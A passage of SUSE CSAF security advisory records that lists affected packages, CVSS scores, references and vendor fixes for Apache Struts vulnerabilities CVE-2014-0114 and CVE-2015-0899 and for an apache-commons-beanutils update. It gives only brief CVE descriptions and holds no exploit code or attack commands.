"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "moderate"
}
],
"title": "CVE-2014-9130"
}
]
}
SUSE-SU-2015:0886-1
Vulnerability from csaf_suse - Published: 2014-06-20 20:43 - Updated: 2014-06-20 20:43Summary
Security update for struts
Severity
Moderate
Notes
Title of the patch: Security update for struts
Description of the patch:
Apache Struts was updated to fix a security issue:
* CVE-2014-0114: The ActionForm object in Apache Struts 1.x through
1.3.10 allows remote attackers to 'manipulate' the ClassLoader and
execute arbitrary code via the class parameter, which is passed to
the getClass method.
Security Issue reference:
* CVE-2014-0114
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114>
Patchnames: sdksp3-struts,sleman17sp2-struts,sleman21-struts
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
5 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
References
16 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for struts",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nApache Struts was updated to fix a security issue:\n\n * CVE-2014-0114: The ActionForm object in Apache Struts 1.x through\n 1.3.10 allows remote attackers to \u0027manipulate\u0027 the ClassLoader and\n execute arbitrary code via the class parameter, which is passed to\n the getClass method.\n\nSecurity Issue reference:\n\n * CVE-2014-0114\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114\u003e\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "sdksp3-struts,sleman17sp2-struts,sleman21-struts",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2015_0886-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2015:0886-1",
"url": "https://www.suse.com/support/update/announcement/2015/suse-su-20150886-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2015:0886-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2015-May/001388.html"
},
{
"category": "self",
"summary": "SUSE Bug 875455",
"url": "https://bugzilla.suse.com/875455"
},
{
"category": "self",
"summary": "SUSE Bug 924887",
"url": "https://bugzilla.suse.com/924887"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2014-0114 page",
"url": "https://www.suse.com/security/cve/CVE-2014-0114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2015-0899 page",
"url": "https://www.suse.com/security/cve/CVE-2015-0899/"
}
],
"title": "Security update for struts",
"tracking": {
"current_release_date": "2014-06-20T20:43:07Z",
"generator": {
"date": "2014-06-20T20:43:07Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2015:0886-1",
"initial_release_date": "2014-06-20T20:43:07Z",
"revision_history": [
{
"date": "2014-06-20T20:43:07Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "struts-1.2.9-162.33.1.noarch",
"product": {
"name": "struts-1.2.9-162.33.1.noarch",
"product_id": "struts-1.2.9-162.33.1.noarch"
}
},
{
"category": "product_version",
"name": "struts-javadoc-1.2.9-162.33.1.noarch",
"product": {
"name": "struts-javadoc-1.2.9-162.33.1.noarch",
"product_id": "struts-javadoc-1.2.9-162.33.1.noarch"
}
},
{
"category": "product_version",
"name": "struts-manual-1.2.9-162.33.1.noarch",
"product": {
"name": "struts-manual-1.2.9-162.33.1.noarch",
"product_id": "struts-manual-1.2.9-162.33.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Software Development Kit 11 SP3",
"product": {
"name": "SUSE Linux Enterprise Software Development Kit 11 SP3",
"product_id": "SUSE Linux Enterprise Software Development Kit 11 SP3",
"product_identification_helper": {
"cpe": "cpe:/a:suse:sle-sdk:11:sp3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager 1.7",
"product": {
"name": "SUSE Manager 1.7",
"product_id": "SUSE Manager 1.7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:1.7"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager 2.1",
"product": {
"name": "SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:2.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-1.2.9-162.33.1.noarch as component of SUSE Linux Enterprise Software Development Kit 11 SP3",
"product_id": "SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch"
},
"product_reference": "struts-1.2.9-162.33.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Software Development Kit 11 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-javadoc-1.2.9-162.33.1.noarch as component of SUSE Linux Enterprise Software Development Kit 11 SP3",
"product_id": "SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch"
},
"product_reference": "struts-javadoc-1.2.9-162.33.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Software Development Kit 11 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-manual-1.2.9-162.33.1.noarch as component of SUSE Linux Enterprise Software Development Kit 11 SP3",
"product_id": "SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch"
},
"product_reference": "struts-manual-1.2.9-162.33.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Software Development Kit 11 SP3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-1.2.9-162.33.1.noarch as component of SUSE Manager 1.7",
"product_id": "SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch"
},
"product_reference": "struts-1.2.9-162.33.1.noarch",
"relates_to_product_reference": "SUSE Manager 1.7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "struts-1.2.9-162.33.1.noarch as component of SUSE Manager 2.1",
"product_id": "SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
},
"product_reference": "struts-1.2.9-162.33.1.noarch",
"relates_to_product_reference": "SUSE Manager 2.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2014-0114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-0114"
}
],
"notes": [
{
"category": "general",
"text": "Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch",
"SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch",
"SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-0114",
"url": "https://www.suse.com/security/cve/CVE-2014-0114"
},
{
"category": "external",
"summary": "SUSE Bug 778464 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/778464"
},
{
"category": "external",
"summary": "SUSE Bug 875455 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/875455"
},
{
"category": "external",
"summary": "SUSE Bug 885963 for CVE-2014-0114",
"url": "https://bugzilla.suse.com/885963"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch",
"SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch",
"SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2014-06-20T20:43:07Z",
"details": "important"
}
],
"title": "CVE-2014-0114"
},
{
"cve": "CVE-2015-0899",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2015-0899"
}
],
"notes": [
{
"category": "general",
"text": "The MultiPageValidator implementation in Apache Struts 1 1.1 through 1.3.10 allows remote attackers to bypass intended access restrictions via a modified page parameter.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch",
"SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch",
"SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2015-0899",
"url": "https://www.suse.com/security/cve/CVE-2015-0899"
},
{
"category": "external",
"summary": "SUSE Bug 924887 for CVE-2015-0899",
"url": "https://bugzilla.suse.com/924887"
},
{
"category": "external",
"summary": "SUSE Bug 983684 for CVE-2015-0899",
"url": "https://bugzilla.suse.com/983684"
},
{
"category": "external",
"summary": "SUSE Bug 983728 for CVE-2015-0899",
"url": "https://bugzilla.suse.com/983728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch",
"SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch",
"SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"products": [
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-javadoc-1.2.9-162.33.1.noarch",
"SUSE Linux Enterprise Software Development Kit 11 SP3:struts-manual-1.2.9-162.33.1.noarch",
"SUSE Manager 1.7:struts-1.2.9-162.33.1.noarch",
"SUSE Manager 2.1:struts-1.2.9-162.33.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2014-06-20T20:43:07Z",
"details": "important"
}
],
"title": "CVE-2015-0899"
}
]
}
SUSE-SU-2025:02056-1
Vulnerability from csaf_suse - Published: 2025-06-20 16:17 - Updated: 2025-06-20 16:17Summary
Security update for apache-commons-beanutils
Severity
Important
Notes
Title of the patch: Security update for apache-commons-beanutils
Description of the patch: This update for apache-commons-beanutils fixes the following issues:
Update to 1.11.0:
* Fixed Bugs:
+ BeanComparator.compare(T, T) now throws
IllegalArgumentException instead of RuntimeException to wrap
all cases of ReflectiveOperationException.
+ MappedMethodReference.get() now throws IllegalStateException
instead of RuntimeException to wrap cases of
NoSuchMethodException.
+ ResultSetIterator.get(String) now throws
IllegalArgumentException instead of RuntimeException to wrap
cases of SQLException.
+ ResultSetIterator.hasNext() now throws IllegalStateException
instead of RuntimeException to wrap cases of SQLException.
+ ResultSetIterator.next() now throws IllegalStateException
instead of RuntimeException to wrap cases of SQLException.
+ ResultSetIterator.set(String, Object) now throws
IllegalArgumentException instead of RuntimeException to wrap
cases of SQLException.
+ ResultSetIterator.set(String, String, Object) now throws
IllegalArgumentException instead of RuntimeException to wrap
cases of SQLException.
* Changes:
+ Add org.apache.commons.beanutils
.SuppressPropertiesBeanIntrospector.SUPPRESS_DECLARING_CLASS.
Fixes bsc#1243793, CVE-2025-48734
+ Bump org.apache.commons:commons-parent from 81 to 84.
+ Bump commons-logging:commons-logging from 1.3.4 to 1.3.5.
Update to 1.10.1:
* Fixed Bugs:
+ BEANUTILS-541: FluentPropertyBeanIntrospector concurrency
issue (backport to 1.X) #325.
+ Javadoc is missing its Overview page.
+ Remove -nouses directive from maven-bundle-plugin. OSGi
package imports now state 'uses' definitions for package
imports, this doesn't affect JPMS (from
org.apache.commons:commons-parent:80).
+ Deprecate BeanUtils.BeanUtils().
+ Deprecate ConstructorUtils.ConstructorUtils().
+ Deprecate LocaleBeanUtils.LocaleBeanUtils().
+ Deprecate LocaleConvertUtils.LocaleConvertUtils().
+ Deprecate ConvertUtils.ConvertUtils().
+ Deprecate MethodUtils.MethodUtils().
+ Deprecate PropertyUtils.PropertyUtils().
* Changes:
+ Bump org.apache.commons:commons-parent from 78 to 81.
Includes changes from 1.10.0:
* Fixed Bugs:
+ BEANUTILS-541: FluentPropertyBeanIntrospector caches
corrupted writeMethod (1.x backport) #69.
+ Replace internal use of Locale.ENGLISH with Locale.ROOT.
+ Replace Maven CLIRR plugin with JApiCmp.
+ Port to Java 1.4 Throwable APIs (!).
+ Fix Javadoc generation on Java 8, 17, and 21.
+ AbstractArrayConverter.parseElements(String) now returns a
List<String> instead of a raw List.
* Changes:
+ Bump org.apache.commons:commons-parent from 47 to 78.
+ Bump Java requirement from Java 6 to 8.
+ Bump junit:junit from 4.12 to 4.13.2.
+ Bump JUnit from 4.x to 5.x 'vintage'.
+ Bump commons-logging:commons-logging from 1.2 to 1.3.4.
+ Deprecate BeanUtilsBean.initCause(Throwable, Throwable) for
removal, use Throwable.initCause(Throwable).
+ Deprecate BeanUtils.initCause(Throwable, Throwable) for
removal, use Throwable.initCause(Throwable).
Update to 1.9.4:
* BEANUTILS-520: BeanUtils mitigate CVE-2014-0114
Updated to 1.9.3:
* This is a bug fix release, which also improves the tests for
building on Java 8.
* Note that Java 8 and later no longer support indexed bean
properties on java.util.List, only on arrays like String[].
(BEANUTILS-492). This affects PropertyUtils.getPropertyType()
and PropertyUtils.getPropertyDescriptor(); their javadoc have
therefore been updated to reflect this change in the JDK.
* Changes in this version include:
- Fixed Bugs:
* BEANUTILS-477: Changed log level in FluentPropertyBeanIntrospector
* BEANUTILS-492: Fixed exception when setting indexed properties
on DynaBeans.
* BEANUTILS-470: Precision lost when converting BigDecimal.
* BEANUTILS-465: Indexed List Setters fixed.
- Changes:
* BEANUTILS-433: Update dependency from JUnit 3.8.1 to 4.12.
* BEANUTILS-469: Update commons-logging from 1.1.1 to 1.2.
* BEANUTILS-474: FluentPropertyBeanIntrospector does not use the
same naming algorithm as DefaultBeanIntrospector.
* BEANUTILS-490: Update Java requirement from Java 5 to 6.
* BEANUTILS-482: Update commons-collections from 3.2.1 to 3.2.2
(CVE-2015-4852).
* BEANUTILS-490: Update java requirement to Java 6.
* BEANUTILS-492: IndexedPropertyDescriptor tests now pass on Java 8.
* BEANUTILS-495: DateConverterTestBase fails on M/d/yy in Java 9.
* BEANUTILS-496: testGetDescriptorInvalidBoolean fails on Java 9.
- Historical list of changes:
http://commons.apache.org/proper/commons-beanutils/changes-report.html
Patchnames: SUSE-2025-2056,SUSE-SLE-SERVER-12-SP5-LTSS-2025-2056,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2025-2056
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
9.8 (Critical)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
critical
8.8 (High)
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 12 SP5-LTSS:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:apache-commons-beanutils-javadoc-1.11.0-7.3.1.noarch | — |
Vendor Fix
|
Threats
Impact
important
References
17 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for apache-commons-beanutils",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for apache-commons-beanutils fixes the following issues:\n\nUpdate to 1.11.0:\n\n * Fixed Bugs:\n\n + BeanComparator.compare(T, T) now throws\n IllegalArgumentException instead of RuntimeException to wrap\n all cases of ReflectiveOperationException.\n + MappedMethodReference.get() now throws IllegalStateException\n instead of RuntimeException to wrap cases of\n NoSuchMethodException.\n + ResultSetIterator.get(String) now throws\n IllegalArgumentException instead of RuntimeException to wrap\n cases of SQLException.\n + ResultSetIterator.hasNext() now throws IllegalStateException\n instead of RuntimeException to wrap cases of SQLException.\n + ResultSetIterator.next() now throws IllegalStateException\n instead of RuntimeException to wrap cases of SQLException.\n + ResultSetIterator.set(String, Object) now throws\n IllegalArgumentException instead of RuntimeException to wrap\n cases of SQLException.\n + ResultSetIterator.set(String, String, Object) now throws\n IllegalArgumentException instead of RuntimeException to wrap\n cases of SQLException.\n\n * Changes:\n\n + Add org.apache.commons.beanutils\n .SuppressPropertiesBeanIntrospector.SUPPRESS_DECLARING_CLASS.\n Fixes bsc#1243793, CVE-2025-48734\n + Bump org.apache.commons:commons-parent from 81 to 84.\n + Bump commons-logging:commons-logging from 1.3.4 to 1.3.5.\n\nUpdate to 1.10.1:\n\n * Fixed Bugs:\n\n + BEANUTILS-541: FluentPropertyBeanIntrospector concurrency\n issue (backport to 1.X) #325.\n + Javadoc is missing its Overview page.\n + Remove -nouses directive from maven-bundle-plugin. OSGi\n package imports now state \u0027uses\u0027 definitions for package\n imports, this doesn\u0027t affect JPMS (from\n org.apache.commons:commons-parent:80).\n + Deprecate BeanUtils.BeanUtils().\n + Deprecate ConstructorUtils.ConstructorUtils().\n + Deprecate LocaleBeanUtils.LocaleBeanUtils().\n + Deprecate LocaleConvertUtils.LocaleConvertUtils().\n + Deprecate ConvertUtils.ConvertUtils().\n + Deprecate MethodUtils.MethodUtils().\n + Deprecate PropertyUtils.PropertyUtils().\n\n * Changes:\n\n + Bump org.apache.commons:commons-parent from 78 to 81.\n\nIncludes changes from 1.10.0:\n\n * Fixed Bugs:\n\n + BEANUTILS-541: FluentPropertyBeanIntrospector caches\n corrupted writeMethod (1.x backport) #69.\n + Replace internal use of Locale.ENGLISH with Locale.ROOT.\n + Replace Maven CLIRR plugin with JApiCmp.\n + Port to Java 1.4 Throwable APIs (!).\n + Fix Javadoc generation on Java 8, 17, and 21.\n + AbstractArrayConverter.parseElements(String) now returns a\n List\u003cString\u003e instead of a raw List.\n\n * Changes:\n\n + Bump org.apache.commons:commons-parent from 47 to 78.\n + Bump Java requirement from Java 6 to 8.\n + Bump junit:junit from 4.12 to 4.13.2.\n + Bump JUnit from 4.x to 5.x \u0027vintage\u0027.\n + Bump commons-logging:commons-logging from 1.2 to 1.3.4.\n + Deprecate BeanUtilsBean.initCause(Throwable, Throwable) for\n removal, use Throwable.initCause(Throwable).\n + Deprecate BeanUtils.initCause(Throwable, Throwable) for\n removal, use Throwable.initCause(Throwable).\n\nUpdate to 1.9.4:\n\n * BEANUTILS-520: BeanUtils mitigate CVE-2014-0114\n\nUpdated to 1.9.3:\n\n * This is a bug fix release, which also improves the tests for\n building on Java 8.\n * Note that Java 8 and later no longer support indexed bean\n properties on java.util.List, only on arrays like String[].\t\n (BEANUTILS-492). This affects PropertyUtils.getPropertyType()\n and PropertyUtils.getPropertyDescriptor(); their javadoc have\n therefore been updated to reflect this change in the JDK.\n\n * Changes in this version include:\n\n - Fixed Bugs:\n\n * BEANUTILS-477: Changed log level in FluentPropertyBeanIntrospector\n * BEANUTILS-492: Fixed exception when setting indexed properties\n on DynaBeans.\n * BEANUTILS-470: Precision lost when converting BigDecimal.\n * BEANUTILS-465: Indexed List Setters fixed.\n\n - Changes:\n\n * BEANUTILS-433: Update dependency from JUnit 3.8.1 to 4.12.\n * BEANUTILS-469: Update 